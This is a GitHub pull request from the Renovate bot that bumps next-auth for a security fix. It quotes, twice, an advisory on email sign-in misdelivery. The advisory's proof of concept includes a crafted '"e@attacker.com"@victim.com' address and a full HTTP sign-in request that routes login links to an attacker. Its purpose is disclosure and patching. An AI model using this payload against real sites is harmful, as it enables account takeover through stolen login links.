Skip to content

fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security]#131

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-next-auth-vulnerability
Open

fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security]#131
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-next-auth-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Oct 29, 2025

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
next-auth (source) ^5.0.0-beta.27^5.0.0-beta.30 age confidence
next-auth (source) ^5.0.0-beta.29^5.0.0-beta.30 age confidence

NextAuthjs Email misdelivery Vulnerability

GHSA-5jpx-9hw9-2fx4

More information

Details

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@​victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version Afftected
4.24.11 Yes
5.0.0-beta.29 Yes
POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@&#8203;auth/prisma-adapter"
import { prisma } from "@&#8203;/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})
POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
Screenshot from 2025-10-25 21-15-25 Screenshot from 2025-10-25 21-14-47
Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NextAuthjs Email misdelivery Vulnerability

GHSA-5jpx-9hw9-2fx4

More information

Details

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@&#8203;victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version Afftected
4.24.11 Yes
5.0.0-beta.29 Yes
POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@&#8203;auth/prisma-adapter"
import { prisma } from "@&#8203;/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})
POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
Screenshot from 2025-10-25 21-15-25 Screenshot from 2025-10-25 21-14-47
Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

nextauthjs/next-auth (next-auth)

v5.0.0-beta.30

Compare Source

v5.0.0-beta.29

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.28...next-auth@5.0.0-beta.29

v5.0.0-beta.28

Compare Source

What's Changed
New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.27...next-auth@5.0.0-beta.28


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch from c5c5c85 to 0ee745a Compare October 29, 2025 23:58
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from 66e698d to 82e8d3e Compare November 11, 2025 05:01
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from a559c32 to c339602 Compare November 19, 2025 01:56
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 4 times, most recently from 8b67e44 to b4e657b Compare December 10, 2025 18:49
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 4 times, most recently from 70f6bcc to c83182d Compare December 17, 2025 01:18
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 4 times, most recently from 2ecbe74 to 73fa7a9 Compare December 31, 2025 20:56
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from d90b395 to 9defc42 Compare January 8, 2026 22:13
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from 24af04c to 2cf6bb6 Compare January 19, 2026 22:02
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from 19f4c23 to b403011 Compare February 2, 2026 22:42
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 6 times, most recently from ce7505e to fbc736b Compare February 18, 2026 01:35
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch from fbc736b to 6e4647a Compare March 14, 2026 22:01
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 3 times, most recently from 11d0a23 to 30b3fb8 Compare April 15, 2026 09:00
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 15, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch from 30b3fb8 to 90dd24e Compare April 16, 2026 09:23
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] Apr 16, 2026
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 16, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from c5fe97a to ea85237 Compare April 16, 2026 21:42
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] Apr 16, 2026
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from f48516b to 79f8760 Compare April 19, 2026 16:52
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch from 79f8760 to 3170049 Compare April 21, 2026 19:02
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 21, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch from 3170049 to f6f45a5 Compare April 21, 2026 23:03
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] Apr 21, 2026
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 23, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from b00ef0e to b8a42dd Compare April 23, 2026 20:04
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] Apr 23, 2026
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 29, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from 3325d9c to fa7c95a Compare April 29, 2026 23:38
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] Apr 29, 2026
@renovate renovate Bot changed the title fix(deps): update dependency next-auth to ^5.0.0-beta.30 [security] fix(deps): update dependency next-auth to ^5.0.0-beta.31 [security] Apr 30, 2026
@renovate renovate Bot force-pushed the renovate/npm-next-auth-vulnerability branch 2 times, most recently from 7961d4d to b1e5f55 Compare April 30, 2026 17:56
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants